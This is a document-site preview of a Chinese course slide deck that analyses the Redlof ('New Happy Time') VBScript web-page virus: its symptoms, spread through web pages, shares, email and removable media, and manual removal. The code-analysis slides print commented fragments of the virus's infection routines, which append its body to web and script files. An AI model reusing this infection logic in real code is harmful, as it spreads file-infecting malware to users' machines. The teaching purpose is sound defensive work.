返回
计算机病毒与防治5-4“欢乐时光”病毒实例.ppt

计算机病毒与防治5-4“欢乐时光”病毒实例.ppt

ID:52769983

大小:665.50 KB

页数:35页

时间:2020-04-13

计算机病毒与防治5-4“欢乐时光”病毒实例.ppt_第1页
计算机病毒与防治5-4“欢乐时光”病毒实例.ppt_第2页
计算机病毒与防治5-4“欢乐时光”病毒实例.ppt_第3页
计算机病毒与防治5-4“欢乐时光”病毒实例.ppt_第4页
计算机病毒与防治5-4“欢乐时光”病毒实例.ppt_第5页
资源描述:

《计算机病毒与防治5-4“欢乐时光”病毒实例.ppt》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、计算机病毒与防治计算机病毒与防治课程小组5-4网页脚本病毒防治欢乐时光病毒的特点及代码分析5-4典型网页病毒剖析计算机病毒与防治课程小组欢乐时光病毒的手工清除新欢乐时光病毒特点病毒名称:新欢乐时光病毒类型:网页脚本病毒危险级别:★★★★★影响系统:Win9X/ME/NT/2000英文名包括有:HTML.Redlof.A[Symantec],VBS.Redlof[AVP],VBS_REDLOF.A[Trend],VBS/Redlof-A[Sophos],VBS.KJ[金山],Script.RedLof[瑞星],VBS/KJ[江民]计算机病毒与防治课程小组新欢乐时光病毒

2、特点新欢乐时光病毒特点新欢乐时光病毒是一个多变形、加密病毒,感染扩展名为.html,.htm,.asp,.php,.jsp,.htt和.vbs文件,同时该病毒会大量生成folder.htt和desktop.ini,并在%windir%System中生成一个名字叫Kernel.dll(Windows9x/Me)或kernel32.dll(WindowsNT/2000)的文件,修改.dll文件的打开方式,感染Outlook的信纸文件。感染这个病毒后有两个明显的特征:a.在每个目录中都会生成folder.htt(带毒文件)和desktop.ini(目录配置文件);b.电脑

3、运行速度明显变慢,在任务列表中可以看到有大量的Wscript.exe程序在运行。计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒——这个网页病毒利用微软IE的漏洞,通过感染一些.html,.htm,.asp,.php,.jsp,.htt和.vbs等文件进行传播。然而由于病毒的本身特性,其传播的途径也有多种:a.通过网页传播。由于病毒会感染网页文件,如果那些网站站长不小心将带毒的网页放到网站上,用户不小心浏览了这些网页就会被病毒感染了;b.通过局域网。当本地计算机设有可写权限的共享目录,或者访问局域网上带毒的计算机的时候就会感染病毒;对于WindowsNT/2

4、000系统,由于存在默认的管理用共享目录,因此,管理员的疏忽也可能会造成感染。c.通过电子邮件。如果发件人使用了带毒的网页文件作为信纸,或者信件中有带毒的网页文件,那么,只要收件人浏览了邮件,也会被感染病毒;d.通过移动介质,如软盘、移动硬盘、光盘等。由于病毒会生成folder.htt和desktop.ini,所以在打开移动介质或打开其文件夹的时候,就会激活并感染病毒。计算机病毒与防治课程小组新欢乐时光代码分析DimInWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,Fin

5、alyDiskSubKJ_start()'初始化变量KJSetDim()'初始化环境KJCreateMilieu()'感染本地或者共享上与html所在目录KJLikeIt()'通过vbs感染Outlook邮件模板KJCreateMail()'进行病毒传播KJPropagate()EndSub计算机病毒与防治课程小组新欢乐时光病毒主运行程序代码新欢乐时光代码分析FunctionKJAppendTo(FilePath,TypeStr)OnErrorResumeNext'以只读方式打开指定文件SetReadTemp=FSO.OpenTextFile(FilePath,1)

6、'将文件内容读入到TmpStr变量中TmpStr=ReadTemp.ReadAll‘判断文件中是否存在“KJ_start()”字符串,若存在说明已经感染,退出函数;若文件长度小于1,也退出函数。IfInstr(TmpStr,"KJ_start()")<>0OrLen(TmpStr)<1ThenReadTemp.CloseExitFunctionEndIf‘如果传过来的类型是“htt“,在文件头加上调用页面的时候加载KJ_start()函数;在文件尾追加html版本的加密病毒体。如果是”html”:在文件尾追加调用页面的时候加载KJ_start()函数和html版本的

7、病毒体;如果是"vbs":在文件尾追加vbs版本的病毒体IfTypeStr="htt"ThenReadTemp.CloseSetFileTemp=FSO.OpenTextFile(FilePath,2)FileTemp.Write"<"&"BODYonload="""&"vbscript:"&"KJ_start()"""&">"&vbCrLf&TmpStr&vbCrLf&HtmlText‘函数功能:向指定类型的指定文件追加病毒计算机病毒与防治课程小组FileTemp.CloseSetFAttrib=FSO.GetFile(FilePath)FAttrib.att

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。